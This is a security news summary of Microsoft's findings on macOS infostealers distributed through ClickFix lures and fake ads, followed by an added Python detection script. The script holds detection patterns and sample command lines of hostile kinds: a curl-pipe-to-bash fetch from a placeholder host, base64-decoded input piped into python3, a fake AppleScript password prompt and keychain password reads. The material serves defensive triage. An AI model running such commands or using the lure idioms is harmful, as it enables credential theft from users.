Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers
Briefly

"The tech giant's Defender Security Research Team said it observed macOS-targeted infostealer campaigns using social engineering techniques such as ClickFix since late 2025 to distribute disk image (DMG) installers that deploy stealer malware families like Atomic macOS Stealer (AMOS), MacSync, and DigitStealer. The campaigns have been found to use techniques like fileless execution, native macOS utilities, and AppleScript automation to facilitate data theft."
"This includes details like web browser credentials and session data, iCloud Keychain, and developer secrets. The starting point of these attacks is often a malicious ad, often served through Google Ads, that redirects users searching for tools like DynamicLake and artificial intelligence (AI) tools to fake sites that employ ClickFix lures, tricking them into infecting their own machines with malware."
""Python-based stealers are being leveraged by attackers to rapidly adapt, reuse code, and target heterogeneous environments with minimal overhead," Microsoft said. "They are typically distributed via phishing emails and collect login credentials, session cookies, authentication tokens, credit card numbers, and crypto wallet data." One such stealer is PXA Stealer, which is linked to Vietnamese-speaking threat actors and is capable of harvesting login credentials, financial information, and browser data."
Information-stealing campaigns now target macOS by using cross-platform languages like Python and abusing trusted distribution channels. Attackers use social-engineering lures such as ClickFix and malicious ads to redirect users to fake sites that deliver DMG installers. Deployed stealer families include AMOS, MacSync, DigitStealer, and PXA Stealer. Techniques observed on macOS include fileless execution, abuse of native macOS utilities, and AppleScript automation; on other platforms the stealers rely on standard persistence mechanisms. Initial access commonly stems from phishing emails or malicious ads, and Telegram is used for command-and-control and exfiltration. Stolen data includes browser credentials, session cookies, iCloud Keychain contents, developer secrets, financial information, and crypto wallet data.
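The summary names a chain that is visible in process-execution telemetry: a ClickFix one-liner pasted into a terminal, a Python or AppleScript stage that runs without dropping a file, and native macOS utilities reaching into the keychain. The triage script below is an added example, not code from Microsoft, The Hacker News, or any of the stealer families; the event format, the rule regexes and the severity logic are assumptions of this example (indicators are not taken from the article), and the sample events are constructed rather than captured from a real incident.

```python
"""Triage constructed macOS process-execution events for the tradecraft the
summary describes: ClickFix pipe-to-shell one-liners, fileless staging,
inline osascript automation and native-utility keychain access.

Added example. The heuristics below are this example's assumptions, not
indicators published by Microsoft or The Hacker News."""
import re
from dataclasses import dataclass

# Assumed: a finding is more suspicious when the parent is an interpreter or
# the terminal, matching the pasted-shell -> Python/AppleScript -> utility chain.
INTERPRETER_PARENTS = {"python", "python3", "osascript", "bash", "zsh", "sh", "Terminal"}

# Assumed heuristics (rule name, compiled regex over the command line).
RULES = [
    # ClickFix lures have the user paste a one-liner that downloads and pipes to a shell.
    ("clickfix_pipe_to_shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    # Fileless staging: a base64 blob decoded straight into an interpreter.
    ("fileless_base64_exec",
     re.compile(r"base64\s+(-d|--decode|-D)\b[^|]*\|\s*(python3?|osascript|(ba|z)?sh)\b")),
    # AppleScript automation driven inline rather than from a script file.
    ("osascript_inline", re.compile(r"\bosascript\b.*\s-e\s")),
    # AppleScript password dialog (a credential-prompt idiom), case-insensitive.
    ("osascript_password_prompt", re.compile(r"display dialog.*hidden answer", re.I)),
    # Native utility reading or dumping keychain items.
    ("keychain_dump",
     re.compile(r"\bsecurity\b\s+(dump-keychain|find-(generic|internet)-password)\b")),
]


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    severity: str
    cmdline: str


def score_event(event):
    """Return every Finding a single event triggers (empty list if benign)."""
    severity = "high" if event["parent"] in INTERPRETER_PARENTS else "medium"
    return [Finding(name, event["pid"], severity, event["cmdline"])
            for name, pattern in RULES if pattern.search(event["cmdline"])]


def triage(events):
    """Run score_event over a batch of events, preserving event and rule order."""
    findings = []
    for event in events:
        findings.extend(score_event(event))
    return findings


def rule_counts(findings):
    """Count findings per rule, useful for a quick per-host summary."""
    counts = {}
    for finding in findings:
        counts[finding.rule] = counts.get(finding.rule, 0) + 1
    return counts


# Constructed sample events (not from a real incident). Keys: pid, parent, cmdline.
SAMPLE_EVENTS = [
    {"pid": 101, "parent": "Terminal",
     "cmdline": "curl -fsSL https://example.invalid/fix.sh | bash"},
    {"pid": 102, "parent": "bash",
     "cmdline": "echo aGVsbG8= | base64 -d | python3"},
    {"pid": 103, "parent": "python3",
     "cmdline": "osascript -e 'display dialog \"macOS needs your password\" "
                "default answer \"\" with hidden answer'"},
    {"pid": 104, "parent": "python3",
     "cmdline": "security find-generic-password -ga Chrome"},
    {"pid": 105, "parent": "launchd",
     "cmdline": "/usr/bin/osascript /Library/Scripts/backup.scpt"},
    {"pid": 106, "parent": "zsh", "cmdline": "git pull origin main"},
    {"pid": 107, "parent": "Keychain Access",
     "cmdline": "security find-generic-password -a user -s example"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"[{finding.severity}] pid={finding.pid} {finding.rule}: {finding.cmdline}")
    print(rule_counts(triage(SAMPLE_EVENTS)))
```

Two design points worth noting. Event 105 (osascript running a script file under launchd) produces no finding, which is deliberate: the regexes key on inline `-e` automation and password dialogs, so a script-file stage would need a separate rule on the file path or its contents. Event 107 shows the same `security` command from a non-interpreter parent scored lower; in practice the parent chain is what separates a Python stealer driving native utilities from a user doing the same thing by hand.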
Read at The Hacker News